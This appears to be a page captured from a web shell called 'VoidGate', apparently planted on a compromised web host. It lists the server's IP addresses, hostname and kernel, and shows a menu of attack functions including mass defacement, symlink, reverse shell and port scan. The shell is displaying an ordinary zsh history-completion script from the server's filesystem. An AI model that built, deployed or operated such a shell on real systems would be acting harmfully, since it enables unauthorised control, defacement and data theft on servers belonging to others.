ヤミRoot VoidGate
User / IP
:
216.73.216.49
Host / Server
:
146.88.233.70 / www.dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
usr
/
share
/
zsh
/
5.0.2
/
functions
/
Viewing: _history
#autoload # Hm, this *can* sensibly be used as a completer. But it could also be used # as a utility function, so maybe it should be moved into another directory. # Or maybe not. Hm. # # # Complete words from the history # # Code taken from _history_complete_words. # # Available styles: # # sort -- sort matches lexically (default is to sort by age) # remove-all-dups -- # remove /all/ duplicate matches rather than just consecutives # range -- range of history words to complete local opt expl max slice hmax=$#historywords beg=2 if zstyle -t ":completion:${curcontext}:" remove-all-dups; then opt=- else opt=-1 fi if zstyle -t ":completion:${curcontext}:" sort; then opt="${opt}J" else opt="${opt}V" fi if zstyle -s ":completion:${curcontext}:" range max; then if [[ $max = *:* ]]; then slice=${max#*:} max=${max%:*} else slice=$max fi [[ max -gt hmax ]] && max=$hmax else max=$hmax slice=$max fi PREFIX="$IPREFIX$PREFIX" IPREFIX= SUFFIX="$SUFFIX$ISUFFIX" ISUFFIX= # We skip the first element of historywords so the current word doesn't # interfere with the completion while [[ $compstate[nmatches] -eq 0 && beg -lt max ]]; do _wanted "$opt" history-words expl 'history word' \ compadd -Q -a 'historywords[beg,beg+slice]' (( beg+=slice )) done (( $compstate[nmatches] ))
Coded With 💗 by
0x6ick